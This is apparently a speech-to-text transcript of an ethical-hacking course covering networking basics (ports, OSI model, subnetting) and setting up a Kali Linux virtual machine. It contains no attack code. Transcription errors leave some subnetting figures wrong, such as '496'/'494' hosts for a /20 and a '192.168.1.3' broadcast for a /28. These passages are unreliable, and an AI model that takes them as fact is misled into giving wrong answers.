this port here i want to connect to your port so port 443 this is a web page we're sending a syn packet if that port is open and available for connection and communication what's going to happen back is that ip address is going to say hey here i am i'll allow you to connect on this port and if we make that final connection we're going to go ahead and send the act packet back which is right here it's going to say ack so that is the three-way handshake please do remember this is going to come back into play when we get into scanning and we'll talk about stealth scanning and how we modify the three-way handshake to actually do some scanning so that is it for this lesson i will catch you over in the next one alright so before we go into the osi model i do want to talk about some common ports and protocols since this is a refresher most of these should be pretty familiar to you i'm going to run through them pretty quickly and just talk about them briefly on each of these common ports and the reason i've listed these is because there are things that we'll see quite often as a penetration tester and it's just something that as we're going through the course if one of these show up it's something that just rings a bell and you see you see a scan it comes back and you see port 21 you just think ah yes ftp or you see port 80 you think ah yes http so you got to start training your mind from memorizing these ports so when we get into our scanning which again we haven't covered scanning but when we get there and we see what ports are open on a machine we're going to be able to have these common ports memorized so on the tcp side we've got ftp ftp is the file transfer protocol you're going to see this in some assessments you're going to see this a lot when we do something called capture the flag we run through some test machines you'll see ftp open quite a bit so ftp file transfer protocol all that means is we can log into this server we can put a file or we can get a file off the server now ssh and telnet kind of play hand in hand telnet is the ability to log into a machine remotely now ssh does the same thing the only difference is ssh is the encrypted version of that so with telnet you are in clear text and with ssh you are encrypted now smtp pop3 and imap all relate to mail we're not going to worry too much about mail in this course but you might see it come back up at some point so just remember you're 25 110 and 143 dns so dns is a way to resolve ip addresses to names and we could take a quick look at that if we go back to our cali machine and say we're at google here we've got google up but the computer doesn't really know what google is the computer's just using nice text like google.com for us to humans what's going on on the backend is google actually resolves to an ip address now the ip address is how the computer knows to get back and forth because we don't want to sit there and type in ip addresses this dns or domain name system has been implemented for us so we type in google.com on the back end it knows hey i want to go out to 17 179 10 22 34 whatever it is in in reality but this is just a quick way for the computer to relate to a human and the human to uh you know have easily readable access to some of this stuff so going back to our powerpoint we have http and https that is a website just what you saw there mostly everything is on 443 now or https the http on port 80 you'll see sometimes remember that is the non-secure version of the protocol so https is encrypted http is not encrypted and not secure so lastly smb ports 139 and 445. originally it was just 139 in the later versions of windows they put on 445 you're going to see these ports a lot this is probably the most common port you're going to see as a pen tester these relate to file shares you might also hear this called samba so there are a few names for it but when you think of smb and you see 139 or 445 think of file shares and as a pen tester perspective you got to think about all the crazy exploits we've had regarding smb the most recent one as of this course was the wannacry virus right so you had the wannacry virus it's also known as eternal blue was what it was built off of or ms-17010 was the official term of that exploit that exploit utilized an smb exploit to navigate through networks so it became very vicious very quick because smb is open so frequently on networks now on the udp side we also have dns over here dns is both a tcp and udp protocol we also have dhcp now when it comes to ip addresses dhcp associates you with an ip address kind of at random now you could have the opposite of that is what is a static ip address so with dhcp you plug into your network say your home network and the internet just fires up guess what probably dhcp on the back end it just picks a number between a range says hey here's your ip address i'm going to let you lease that out for eight hours or a day or a week or however long the timing is set for and that ip address is yours now the opposite of that again is static so you could say hey i want a static ip address and anytime i plug in with this specific computer go ahead and give it this ip address so how are we going to know that most likely the mac address right so from layer 2 it's going to know layer 3 and how to assign it so again dhcp should be pretty familiar to you we've also got tftp on port 69 which is the trivial ftp and it utilizes udp instead of tcp and we also have snmp which is the simple network management protocol so you will encounter snmp occasionally on networks not always but when we do encounter it there may be some information to be gathered especially if there are strings being used that are community or public strings and we'll worry about that when we we encounter it but you'll probably see it again in this course so that is it in this video we're going to go ahead and move on to the osi model and tie all this together then we'll get into a little bit of subnetting and we'll end this with a refresher on networking a final final video on networking so i'll see you over in the next video all right so this whole time we've been talking we've been talking about networking and i've been throwing terms at you and i every time i throw a term at you i try to use the respective layer for it so you've heard me say layer two layer three layer four and those all correspond with what is called the osi model now if you're ever in a network interview or if you're ever talking to somebody who has experience in networking or even if you're on the help desk taking tickets knowing the osi model is incredibly helpful and people will just throw layers at you especially the people who have been in the field for quite some time might just say layer 2 instead of a switch or they might say layer 3 instead of a router so i'm going to discuss the osi model really quickly give you a mnemonic on how to remember it and just talk about some of the concepts within it and how to troubleshoot down it as well so i picked this up from keith barker a long time ago great trainer by the way and this is the mnemonic so we're gonna go p d n t s p a and this stands in my head for please do not throw sausage pizza away again that is please do not throw sausage pizza away so i'm going to put numbers corresponding to the layers in front of it here and we're going to go ahead and type these out one by one so on the first layer here we've got what is called the physical layer and you can think of your physical layer as like data cables or like your cat6 cables stuff like that something you might you might plug in right that is the physical layer and we've already talked about layer two quite a bit layer two is the data layer and that is our switching right and also our mac addresses going down the list we've got the network layer which is ip addresses also routing the fourth layer is the transport layer which is tcp udp which we have talked about as well and the last few so the session layer we've got the session layer which is just session management you don't really have to worry too much about this one uh six is the presentation layer now this should be familiar to you because think about wmv jpeg movie files that's what your presentation layer is so media and then lastly we've got the application layer which is like http smtp your applications that you utilize right so we've got this laid out here and you might be asking why is this important well again when we say something like my home router is a layer 2 3 so that means it does it does switching and it does routing right you might think of this in another way as well you might be asked to troubleshoot and something to talk about too with the with the osi model is when we receive data we receive data down this physical layer all the way down to the application when we transmit data it goes out the application layer down to the physical when we're troubleshooting this it is always best to start with the physical and go down to the application level okay so say you get a you're working help desk and you get a phone call and somebody says you know my internet's not working help me well what's the first thing you're going to do are you going to ask some application level questions yeah probably not you might say hey can you look at the back of the computer do you see a uh the cable plugged in oh the cable is plugged in okay well uh do you do you see the the where the cables plugged in is there a blinking light is that blinking like green by chance okay we're checking the nick right and then we might ask them to you know do they have an ip address what's going on uh all the way down and then we troubleshoot all the way down to layer seven so we wouldn't start on layer seven right we would start from the basics and move down so it's important to know this this isn't a help desk course by any means but it's super important to know this especially if it's been a while since you've seen this network stuff or even if this is new to you that the osi model is commonly referred to even as a pen tester i get all kinds of layer two layer three talk and you will be sitting in meetings with network engineers with people who are very very smart about this stuff and they're gonna throw all this lingo at you so if you know this lingo really really benefits you or else you're just gonna sit there and wonder what the heck they're talking about so hopefully this is a quick informative method for you and again remember please do not throw sausage pizza away that's the easiest way that i remember it you can make up your own mnemonics if you want people have other things as well if you've got a you got a favorite mnemonic please feel free to comment down below and tell me your mnemonic as well so i'd love to hear some of these other ones so let's go ahead and move on into subnetting and then we'll uh we'll start moving into other fun parts of the course let's talk about subnetting so subnetting is important in networking you hear about it all the time you hear even people perhaps freaking out i know i freaked out when i heard that i had to do it for exams like network plus or ccna and i feel like there are a lot of complicated methods out there for submitting but there was a method that was shown to me middle of my career and it just blew my mind it's really really fast subnetting method and i really want to break down for you what subnetting is why we do it and then show you the methodology behind it so if we want to talk about subnetting if we just come in here and just do an ifconfig and we look at our ip address right we have our inet which is our ipv4 and you can see here too we have this netmask this is also known as a subnet mask or a subnet and it just says 255 255 255.0 it doesn't really tell us a lot if we don't know much about it but this is what a subnet looks like and we can think of subnets in ones and zeros it's all bits right so we've got eight bits here just like an ip address ipv4 same thing eight bits eight bits eight bits and another eight bits and we've got ones and zeros if all the ones are switched on we've got 255 if none of the ones are switched on we've got zero and depending on how those ones and zeros are switched on or off determines a lot of things for us and that's why this net mask is important now attached to your resources for this course i've created an excel sheet that i think will be useful so if we look at the excel sheet here is the cyber mentors subnetting sheet and let's talk through this it looks like a bunch of numbers and it might look crazy for you and we're going to talk about how this breaks down how the bits break down and then how i would write this shorthanded for an exam or test or just something that i do on a day to day basis so first let's talk about the bit so come to the bits tab here and we have our eight bits right we can count this across and there's eight here on the count you can see that and it starts with 128 and descends down to one you just keep cutting it in half right so 128 64 32 16 8 whatever what's more important is why we get to these numbers so if we have a one switched on here it adds to the value when all the ones are switched on it equals to 255. you see all the ones switched on here if we were to highlight over all this come down to the sum you see the sum is 255 that's all this formula is doing here so if we were to come through and you see all the zeros here nothing's flipped on to actually turn any value on here how this actually works is the switch has to be on in order right so if we were to switch on another bit we'd have to switch it on here and we'd have to switch another one on here we couldn't just come down here and switch it on here it wouldn't make sense it doesn't work that way not with subnetting so we're going to take these back off and just show zeros again but you see how the values change if for example we had this network and you saw the default and i'm showing you the two five five two five five two five five zero the standard here because that is what's known as a slash 24 network that's very very common and it's very common because it's used mostly in households and small businesses and it's done this way because of the amount of hosts that it allows now if we talk about the host you can see that i have here two to the eighth power why do i have that well we actually go by how many bits are switched off or how many hosts are available to us so if a host here or a bit was switched on then we lose the amount of hosts we have available to us and this subnet gets smaller and smaller now don't worry too much about the ones and zeros it's going to make a lot more sense when we stop talking in these binary terms i just kind of want to break down the math behind it first before we make it really really simplistic so again we've we're talking about what's called the slash 24 or wac-24 network and it's so standard because of the host again 256. think of all the devices in your house you have cell phones you probably have computers you might have like a roku or amazon fire or something along those lines you might have smart tvs or smart watches or something that connects to the internet well again they're all connecting through nat right and going out but the amount of hosts that you can have on your private network really depends on the subnet mask and how you set it so we have this class c that you saw before the 192 168.1 or dot zero or however you wanna have it right well it allows us to have 256 when we have a subnet of slash 24. so that's very common for a household it's also common for a small business maybe there's a printer some few devices in there but they're never going to get over this 256 hosts okay so when we come to the subnet cheat sheet let's break this down a little bit differently so we have our host here let's start with the slash 24 we just were and you saw that there is 256 available hosts as we start turning off bits okay we turn off a bit here we turn off a bit keep going down the list the hosts start getting bigger and that just corresponds here we have a slash 24 and the only reason i'm saying 24 is i'm counting the ones across right so we've got 24 bits switched on if we had 23 okay it gets bigger and bigger and bigger now let's stay away from the ones and zeros i think it's a little bit complicated the better way to think about this is to look at the subnet mask down here and i'm going to replicate this and then we're going to come back to it so what i do here is we can have a possibility of 32 bits switched on right so i'm just making a new tab and i'm just going to go over here and i'm going to hit control and drag this across until it hits 8. okay and then i'm gonna do the same thing with nine i'm gonna drag it across all i'm doing is just making really quickly 32 placeholders and i'm just emulating here if we had the possibility of 32 different switched on bits so imagine one bit is switched on imagine all 32 bits are switched on that's the possibilities here right so always for sure we're going to have an amount of hosts and we're going to have a subnet mask okay so we'll just call it subnet there we always start here with 128 just like the bits that you saw you saw the 128 start on the bits let's just start also with 128. now as you saw every bit that's switched on remember when we switch a bit on over here it starts decreasing so we're going to decrease for the bits that are switched on 64 32 16 8 4 2 1. you come over here and what i like to actually do is i like to just add these numbers together and you can see 128 and 64 is 192 and then you can add these two together so you get 192 32 you just add diagonals the way i i actually always do it so 224 240 248 252 254 and 255. now what does that correspond to it corresponds to the possibilities of the bits being flipped on right so this looks just like what you see here same deal and if you had a one underneath of it okay then you got 128 if you've got another one underneath of it well guess what you've got 128 plus 64 which is 192 and this number keeps growing why is this important this is still all ones and zeros right well let's start thinking about it if we have a slash 24 network we've got 24 bits turned on our subnet mask is dot 255.255.255.0. if we had a slash 16 it becomes two five five dot two five five dot zero dot zero why where are these changes coming from let me show you this okay for a slash eight i'm just tying this in just just this right here well this is coming from the number of bits that are turned on eight bits turned on we've got two five five and the rest are zeros you got another eight bits turned on two five five two five five the rest are zeros come down to the slash 24 which is that really common subnet that you see and you've got two five five two five five two five five zero now this is very common okay let's go back to the cheat sheet now and you can see that i've got x as a placeholder in the subnet so what i'm saying here is you look at this list and you say i've got a slash one well for this whole area here from one to eight the placeholder is gonna hold in place of this x so for a slash one if i've got 128 then guess what it's going to become 128.0.0.0 because that's how it would be and if you were turned on just one bit here and made all of these zeros guess what just the 128 would be on the rest would be zeros okay if we had a slash 14 okay so two five fives automatically flipped on you have a slash eight already you pass through it okay so you're starting on the second iteration here slash 14 corresponds down here to 252 so you'd have a 255.252.0.0 so all this is is placeholders let's go back to the sheet here so i make this quick and dirty list this is what i write out when i'm just writing out something quick for an exam i'll write out 1 through 32 i'll put the host here and i'll put the subnet here so again if we know that once we cross through 8 16 24 32 that has a 255 in front of it all we've got to do then is we'll say slash 27 well we've come through three columns then i know for sure that we've got 255.255.255. dot something right you see the slash 27 you come down here the subnet would be 224. say 28 okay 255 255 255. look at the 28 you've got a dot 240. and this is going to be confusing this is subnetting is not necessarily easy once you get the chart down it makes a lot more sense so let's start piecing some more things together when i say that i've got host now the hosts i'm showing you only correspond to these first rows but it's very common or very useful just to know this number right off the bat now if you look at the cheat sheet what you can do here is you just know that you start with a 1 or you start with the 128 you go down but every time you go up you're doubling and why are we doubling do you remember from the bits part every time a bit is turned off so as we go up a number we take it to the next power so we've got eight bits turned off we take two to the eighth power it's 256. well here you go look come through here 256 we go to the ninth power 512 to the 10th power 10 24 it just keeps doubling okay that's all you got to think about in your mind is it keeps doubling so on an exam for example you might have something like what ma how many hosts could be potentially in a slash 20 network and you come to your cheat sheet that you made or you have in your head and you say well 496 and then we'll get to this in a minute but we have to subtract two so 494 potential and why is this all important what do we even care about any of this why am i rambling on well you need to know based on the network okay the slash 24 is great for a small office home network however you want to have it but what if you're a large enterprise maybe you have thousands of devices okay maybe you want a slash 16 network that might make more sense for you or you even see some with a slash 8 network it just depends on how big the company is the larger the company the greater chance that you're going to see that they're not using slash 24 or they could even have subnetted segments of their network where say they have just telephones and they've got 500 employees and 500 telephones they might just have one slash 23 network for nothing but telephones because that's the amount of hosts that fit in there so what we're after with subnetting is how many hosts can we fit and what is the mask that's behind it so those are questions you might be asked in an exam and these are questions that you're just going to see and when you're given addresses say you're doing a pen test for a client you might be given something like this you might be given an ip address 192.168.1.0 24. okay and immediately in your head you're like oh slash 24 that's standard there could be up to 256 hosts or 254 hosts or devices in this network but if they gave you something like 192 168 1 dot then you might look at your little chart and say 4094 host remember we're going to subtract two 4094 hosts in this network now i know if i'm scanning this i'm up against a lot more devices potentially than i am in this okay so when a client gives you your subnets they might just write it out like this and depending how big your client is might depend on how big their subnets are for you for example i just pen tested a client that was a slash 16 all the way across and it looks something like 10.1.0.0 16. okay and your subnet mask for that would be something like 255 255 and how does this come into play well every time you have a 255 that number is locked in place that's another way to think about this so that 10 is always locked down this one is always locked down the rest of the bits are fair game meaning we could have 10.1.1.0.1.2.3. we could actually have a zero here 0.1.2.3.4 and that's how this number for like a slash 16 gets so big because you have 10.1.0.0 through 255 on the possibilities which equals 256 hosts okay for one range you get 256. well imagine you have to do that 255 other times right and that number gets substantially bigger here and then if you were to have a slash 8 then of course it gets bigger and bigger so what you need to realize are a few things here we have these addresses and you see the slash one slash a again we call them wax whack 24 is going to be very common i would say wax 16 is probably your next common you might see some weird submented networks like this subnetted networks like this but typically it's slash 24 16. now your network id is typically what is known as your first address and your broadcast idr id is known as your last address this is not always the case but it is very common and let me log back into this cali machine here and i'll show you so we have our ip address 192 168 57.139 and we've got a net mask of 255 255 2550 what does that tell you from what we just learned that tells you we have a slash 24 network okay this is a common network there are potentially 254 hosts why do i keep saying that why do i keep subtracting true well we've got a network id and a broadcast id or broadcast ip here well what we need to know is we are dot 139 we could be anywhere from dot one to dot 254 within this network that's our 254 possibilities this zero means we have the flexibility to be any ip address range from 1 to 254 usually usually a dot 0 for this ip here in a 255 make up your network id and your broadcast ip okay usually so if we were to say something along the lines of let's go back to this excel document and we were to say something along the lines of this let's say that we have a slash 24 network and we want to know how many hosts we want to know how what our network id is and what our broadcast id is for ip is okay we would say okay and we'll we'll give it one more we'll say it's a slash 24 and the ip starts with 192 168 dot 1 dot 0 okay or we can even write it like this 192 168 1.0 slash 24 delete this and we'll say what's our subnet mask what's our host what's our network what's our broadcast so subnet you come to your cheat sheet you say okay 24 i already know that i need to be filling in this area here on the x so i'm just going to come in 255 255 what's the x well we know to come down this row 255 here dot zero okay and then we've got host so i'm just going to expand this a little bit we've got the host okay hoster right here 256 hosts potentially 254 though because we always subtract two from the host total so our network id is usually the first address available to us which is 192.1681.0 the broadcast is 192.168.1.255. meaning available to us is anything from dot 1 to dot 254. let's take a look at something else that's uh a basic example let's do like a slash 28 let's say we got 192 168.1.0 28. now what well we've got 16 hosts here okay so our subnet is then gonna fill in two five five two five five two five five dot x right because we're in this row slash 28 says it's going to be a 240 when we drop down to the subnet mask i'm going to make this a little bigger how many hosts 16 minus 2 we have 14 hosts okay so the first non-host would be 192.168.1.0 again still the same thing first first address last address is going to be what 192.168.1.15. that makes sense 0-15 is 16 addresses usable space is 14 because we take out the network and the broadcast now you could see something like this and then guess what you're segmented so because you're only using this little bit of space you can then in turn have something like this 192.168.1.16 28 and then it starts the same way your subnet mask is actually the same because you're using a slash 28 you come through you can just copy and paste that the hosts are still the same what changes here well your first address 192 168.1.16 and then your last address which is 192.168.1.3 so because this is smaller on the slash 28 side we can actually have multiple networks within like say a dot 1.0.1.16.1.32 you get a multiple little networks here with only a small amount of hosts so maybe you have just a few servers in this range and you have like servers um a b and c they go into 28 and then you have another one of servers d c and e or d d e and f however you want to say it and you have more in that range okay so you can subnet this out into different things and when we see subnets we see all kinds of stuff we can see phones servers user computers wireless all different sort of things some companies get really specific with their subnetting now let's try one more let's say we have a slash 23. now i want to put in 192.168.1.0 23 but that would be wrong why would this be wrong this is actually going to be a zero and i'll show you why in a second so we're no longer locking in the this this number anymore right when we get below the slash 24 the 255 all the way across for three of them guess what we're now have the ability to change this number other than what's locked in so let's do a dot zero we'll talk about y let's hit enter here so a subnet on a slash 23 well we're going to do a 254 which is going to be the placeholder of the x here we're going to come in and say 255.255.254.0 and now again we're not locked in so remember this 255 would lock in this dot one that doesn't happen anymore so we've got 255 255 254.00 we're actually going to start at zero here and we're going to say the number of hosts that are possible it's 510. okay 512 minus 2. we'll say our network id is 192.168.0.0 and our broadcast would then be 192.168.1 why okay so we have the possibility now that we're spanning two ranges we've got 510 hosts in this network okay and we have the ability to go between zero and one we've got two options now zero and one so if we were to say another network if we wanted to get to like a two we'd actually have to say 192 168.2.0 23. it would be the same subnet mask same number of hosts but then this would be 192.168.2.0.192.168.3.255. again there's 500 510 possible hosts in between this right because you got to think 0.1.0.2.0.3 all the way through 254 and again 1.1 1.2 all the way through 254. so that equals 510. once you've hit that maximum that 1.255 then guess what you start at 2 you have a whole new network here just like these smaller segments you get whole new networks on the bigger side as well so what you need to know is that when i if i would have put something like a 192.168.1.0 23 that would have fallen into line with the 1 and the zero and our actual network id still would have been 0.0 and a 1.255 would have been the broadcast here and you can double check this anytime you're confused you can double check your cider notation so i'm going to bring over a website that i will show you here and this is just an ip addressing guide it's called ipaddressguide.com you bring this over and you scroll down just a little bit and i just put in 192.168.1.0 23. and you can see that it actually corrects me and says the first bit is 192.168.0.0. the last one is 192.168.1.255. total host is 5 12 minus 2 shows you that again first ip last ip you got your netmask very easy to use a cider calculator here or an ip range to convert to cider as well so very useful calculators but if you're not allowed to use these for like an exam purpose or something along those lines then using the cheat sheet that i've shown you is super useful now what i want to do is i want to try three more subnets okay i'm going to write these out i'm going to say 192 168.00 192.168.1.0 26 and 192.168.1.0.25 i want you to solve these for me tell me the subnet mask the host network and broadcast and with that being said this again is a very complicated topic i did not pick this up the first time or the second time that i got it if you're running confused right now perfectly normal you can go back and watch this video again try to pick up more topics try to understand it maybe i'm not the right instructor for this either i do recommend looking at other resources to completely fill in your knowledge gap if there is one that exists another resource that i'll link down is what it's called seven second subnetting it is very useful a lot of students have recommended it to me i'm gonna push it forward as well so go ahead and try to solve this understand that what you're after here is just understanding what a subnet is okay when you see something like this if a client sends you 192 168 1.0 24 you're gonna say hey okay i know that there's probably 254 hosts in that network and i know what i'm working with if you see this 255.255.255.0 again you know that you're working with a slash 24 network very standard stuff that's what we're after i don't expect you to ever memorize this i don't have this memorized like i don't come in here and say you know a slash 18 is a 255 255 192.0 network and it's got 16 384 hosts i don't do that okay i have a cheat sheet i'll use a website if i need to for the most part what you need to understand is to 254 hosts for a slash 24 if that number has gone up to like a slash 28 you know you're dealing with less if that number is lower like a slash 16 you know you're doing with a bigger network that's really what it comes down to unless you are working in networking and then these become more important but as a pen tester understanding how to read this understanding what the subnet is and just identifying it with very basic measures this is extremely useful so i will catch you over in the next video when we talk about solving these challenges and hopefully we got them all right so i'll see you over there in the next one all right so in order to be successful in this course we are going to be utilizing what is called a virtual machine now virtual machines are known as vms for short and a vm is just a machine on top of a machine and to give you an example i'm actually running this windows 10 instance that you see here on top of my windows 10 instance so here you can see if i scroll up that i have a windows 10 machine i also have a linux machine sitting here if i were to de-maximize this you can see that i'm actually running here a windows machine in the back this is my wife and i and you come through here we just blow it back up and we're back inside of our machine so a virtual machine is just a machine inside of a machine so what we're going to be doing is we're going to be utilizing this to build out labs that way we don't have to actually have a bunch of hardware we can just use this for our our course and run what we need to on top of our own machine already now this can get resource intensive so if you are only utilizing something like eight gigabytes of ram then you might have some issues with this but you can still follow along when we get into the active directory portion you might run into issues if you do not have at least 16 gigabytes of ram to utilize but we'll worry about that when we get there there are still plenty of ways to follow along throughout this whole course so another thing to note is that i use vms every single day this machine that you see here is actually my day-to-day pen testing machine so i run a kali linux instance on top of my windows machine and utilize that to do penetration testing so i'm going to demonstrate that to you and how we're going to build out our labs with that and a lot of us in the industry run through vms as opposed to running it directly on metal or on a machine so in order to utilize virtual machines we first need some sort of virtual machine software to play these so there are two different ways that we can do this if you are on a windows machine or a linux machine you can utilize vmware workstation player now if you type in vmware workstation player in google the first one here that says download vmware workstation player you just click on that and if you are in a mac environment you're going to be utilizing oracle virtualbox so if you type in oracle virtualbox you come here and you go to downloads you have your option there as well so in this course i will be using vmware workstation player i'm going to be running it on top of windows if you are using mac that is absolutely fine you're going to be following along just the same all you need to be able to do is follow the same instructions that i give you and you will be a-okay so if you scroll down here you can see try workstation player for windows or try workstation player for linux go ahead and just select download now that should bring up a download and go ahead and save it if you're doing virtualbox go ahead and download for os x i will download the windows version just so that we can we can see what that looks like as well so i'll save both of these so let's view our downloads and we've got vmware workstation player here i'm going to go ahead and open this one and we're going to install this and this will be very point and click so next accept the agreement possibly give away our first child yeah we should go ahead and install the enhanced keyboard driver while we have this and then we don't need to enjoy join any improvement programs or check for product update that's okay we will install desktop start menu you check check your preferences as you like it i'm just going to install this and this should just finish here in just a second okay then you'll be brought to this screen once everything's done it should take about a minute or two and we're going to go ahead and hit finish and it's going to want a restart to take effect you can go ahead and restart your system i'm going to say no right now let's go ahead and install virtualbox if you are a mac user we'll hit next next here next and yes and install accept and again very point and click with the installation select install and any options that do pop up and then we can start oracle vm if we want let's go ahead and just start that this is what oracle vm looks like and let's see if we can start the vmware player here even though we need to restart and this is what vmware workstation player looks like so here you can see that we have virtual machines we can create new virtual machines open ones etc we'll get into that in the next video so again if you are using windows or linux this is probably what your view is going to look like for the rest of the time if you are using oracle on a mac this is what your view is going to look like another site pro tip here is that i am using workstation pro and i might utilize this in some instances throughout the course uh other instances i'll be utilizing the workstation player they are not much of a difference especially in the beginning when we get into the active directory portion it might actually be worth it for you all to download the vmware pro trial because the trial is 30 days and you can utilize that to get through some sections and actually have nice little windows here to to be clean and just have a pro edition i you can do everything i'm going to show you in the course on the player it just is that you have to open if you want to run more than one machine you'll just have to reopen the vmware workstation player uh several times to run multiple machines but that's okay it just won't look like this nice clean layout where you can transfer between machines like i can do just here so with that being said let's go ahead and move on to the next video we're going to be installing kali linux onto our vmware workstation player all right so now that we have our vmware player installed we're going to need to put a vm on top of that so throughout this course we're going to be utilizing linux more specifically we're going to be utilizing a linux called kali linux now if you've never used linux before that's absolutely okay we have a section coming up on introductory linux and we'll get you completely up to speed but for now we need to be able to install linux so that we can use it and kali linux is a debian based version of linux and it is a pen tester linux so this is completely built for ethical hacking as you're going to see once we dive into it so i've gone ahead and just went to google and typed in kali linux download and if we scroll down we're going to skip this first section here let's scroll down to this kali linux custom image downloads from offensive security we're going to click on this link and we're going to scroll down a bit and you can see that there are kali linux vmware images now if you're utilizing vmware this is exactly what you're going to use here and if you're using virtualbox then you're going to use this down here since we are using vmware i'm going to go ahead and select the 64-bit download here so we're going to download 64-bit you can either download it just by clicking or you can download the torrent as well so this is going to download a 7-zip file i'm going to go ahead and just hit download and save and this is going to take a second this is 2.2 gig so go ahead and pause the video once your download is complete we'll go ahead and start from there okay so the download has finished and i'm going to go ahead and select open now if you do not have a 7zip installed on your machine you're going to need to install 7zip so you can go out to google and just say 7zip download and if you go to download 7-zip right here download the appropriate one for you here is the executable 64-bit for windows so go ahead and download this one install it again point-and-click and you'll have 7-zip on your machine so once you have that come back here and we're going to need to extract this so go ahead and get your file extracted i'm going to do that really quick and i'm dragging this over just to show you it's going to take some time i'm just putting it in my downloads folder so again we're just dealing with a lot of data compressed i think it's 2.2 gigs uncompressed around 9 or 10 gigs so make sure you have the space as well when you do extract this so once this is done extracting your machine go ahead and unpause the video and come back and then we'll actually get kali linux up and running okay so now i've got my vmware workstation player open our files are extracted i'm going to go ahead and just select open a virtual machine and i've navigated to the folder that i needed to get to which is just my downloads folder with this kali 2019.3 i'm gonna go ahead and open that and now you should see the files open before we go ahead and do this let's go ahead and just select edit virtual machine settings and there's a couple things that we need to talk about in here so the amount of memory that you allocate depends on the amount of memory that you have so here it tells you the recommended amount and the amount that you have maximum available so for my system for example i have 32 gigabytes of ram now i would probably give this machine somewhere between four and maybe eight gigabytes i would say four gigabytes if you do not have a lot of ram go ahead and leave it at two gigabytes uh two gigabytes is fine you might notice a tiny bit of slowness but it's nothing that's going to keep you behind at by any means so i'm going to bump this one up to 4096 which is four gigabytes and i'm also going to take a look at the network adapter now we haven't gotten into networking yet but we're going to cover some of these topics so nat is a protocol that we can use or we can use bridge go ahead and leave it for now at nat if we need to change it to bridge later we will nat should be perfectly fine if you don't know what that is that's okay we're going to cover that here in a little bit so we'll select okay and we're just going to hit power on and when you get this prompt all you have to say is i copied it and it's going to boot up your kali linux machine now this is the first time booting it sometimes you can full screen it sometimes you can't as of right now we just tried to full screen it doesn't work yet so go ahead and let this boot up it shouldn't take but just a second okay and now we're going to be brought to this login screen here and the password is going to be well the user is going to be cali password is going to be cali and you just log in might take a second to log in on the first go now you'll be brought to this screen now what you may or may have not noticed is that this is a perhaps different version of cali that you're running things do change as the videos go on what you're hearing on this video is actually an update from where we were at as you saw me installing i was installing 2019.3 as we are working through the course i'm actually going ahead and doing updates so this is now 2020.4 and we are adding updates to the course so the notes that i have for you before we move into the linux section is if you're installing cali and it looks a little bit different that's okay these versions do change over time sometimes they do get major updates when that happens i update the course um here we are on the latest and greatest as of right now so this is kind of what it looks like but don't be too worried if your image or background or things look a little bit different everything that you're going to learn is 95 the same for the most part so let's go ahead and move forward we're going to go and move to the next section we start talking about kali linux and we start talking about an overview of what kali linux is and how to navigate around it and we'll talk about linux and linux commands as well so i look forward to seeing you in the next section okay so this video pertains to some updates we need to make to virtualbox for quality of life so if you're not using virtualbox you can go ahead and skip this video if you are buckle in we just need to do a couple of quick updates and then we should be good for the rest of the course so go ahead and go out to google and google virtualbox extension pack what it's going to bring up is just the downloads page of virtualbox so we're going to want to go here and on this page if you look kind of towards the middle you'll see that there is a virtual box extension pack here we're going to just click all supported platforms and that will automatically download the file that we need so once that is downloaded in pause if you need to go ahead and open virtualbox and you can come in here and up at the top we're going to go ahead and click on preferences and from here we are interested in extensions see extensions right here go ahead and click on that there's a little plus sign we're gonna go ahead and click on that and then you should have your downloads right here so we're gonna take the downloads and just go ahead and install that hit install read this give away your firstborn accept all the terms and you should be good very quick install okay the second thing we need to do is we need to come to the one tab up here above which is network we're going to go ahead and hit the network button or this add button and we're gonna add what is called a nat network okay and we're gonna come in here and we're going to double click and you can go ahead and keep these defaults i'm gonna actually change them to 192.168.57.0 because that's what's going to be used through the rest of the course and that is what the cider notation of my cali machine and my keyoptrix which you'll see later etc all fell into this 57.0 so we're going to go ahead and keep it on this network make sure you support dhcp go ahead and just hit ok hit ok and then for a machine and make sure any machine that you use again any machine that you use in this course make sure you set it to nat network if you're using virtualbox so you can come in here click on a machine like this mail machine i have here you can just click on that settings go to network and then you can go ahead and just go to nat network all right and that name right here you see name net network that's all we're going to use that'll automatically set it up so when you have a cali machine running later and you have key optics or another box running or even when we build out an active directory lab you need to make sure that you're running that net network so that all the machines are on the same subnet if you don't you might run into a situation where the same ip comes up for the same machine and then they're conflicting with each other or you get on different networks and some weird stuff happens so make sure again that it's imperative that you're setting that net network for every single machine that you're setting up so with that said we're gonna go ahead and move on to the next video in this section the first thing i'd like to do before we get started with any commands or anything like that just take a look around kali linux and kind of demonstrate why a pen tester or ethical hacker might use this distribution of linux now throughout the course as stated in the last video you might see a different version of this pop up as i recorded videos on some of the older versions everything should still work just as is you just might see a different look and feel to some of the cali interface but all the commands i'm going to show you everything that we do is going to be the same so let's take a look and just explore kali linux just for a bit so if we come up here into the corner and we just click on the little cali logo you can see that we have nice things broken out for us so we've got these favorites up here which we have our terminal which we're going to be living in essentially we've got a text editor we've got a web browser which is basically firefox we've got some other tools down here docs etc the other thing that we can come scroll through is we can see that we have different applications in here if we look at the different sections these kind of go in order which we haven't covered quite yet but in the order of how a hack might go down so information gathering is usually the first step you can come in here look through this and here's a bunch of tools related to information gathering you can even click into these and go deeper if you wanted to related to specific things so dns or smb or open source intelligence all of this that's in here this is just built in tools so let's say we're coming in here we want to do a wireless attack well we go to wireless stacks we've got a bunch of tools already built in so kali linux is just essentially a ethical hacking distribution of linux and it's built on debian so if you've ever used something like ubuntu or anything along those lines of a debian distribution this is all going to feel really familiar to you with just a bunch of tools built in on top of it so fairly straightforward they do have some nice tools in here you can come through and utilize these a lot of this is already built in and we're going to take a look at that as we go okay so the next thing that we're going to do is and throughout the rest of this course is start looking at the terminal so if you come up here you'll see that we have a terminal now mostly everything that we do is going to be done in this terminal here now this is almost like accessing the command line so if you're using a command line like in windows for example if you ever use command line if not that's okay but we do a lot of this from this interface as opposed to maybe utilizing a gui base interface where if we clicked a folder this might look more familiar to you if you're a windows or mac user you come in here you have this kind of area yeah yeah we can do that and sometimes we'll utilize this but a lot of times we're going to be living right here okay so as we move forward we're going to start talking about this command line how we can utilize it and use it to our advantage and then we'll do some tips and tricks and hopefully learn some pretty neat stuff as we go so in the next video i'm going to cover the pseudo feature which i think is important it's something that was brought in now originally we had something called a root permission and we'll talk about that that has changed since 2020.1 moving forward so we're introducing that into this course and we'll talk options that you have so let's go ahead and move to the next video where we talk about the pseudo feature all right so before we look at any commands or learn any command line we have to talk about sudo sudo is very important and what had happened previously was that in the earlier versions of kali linux we ran as a user called root root is the ultimate user you could think of it as the 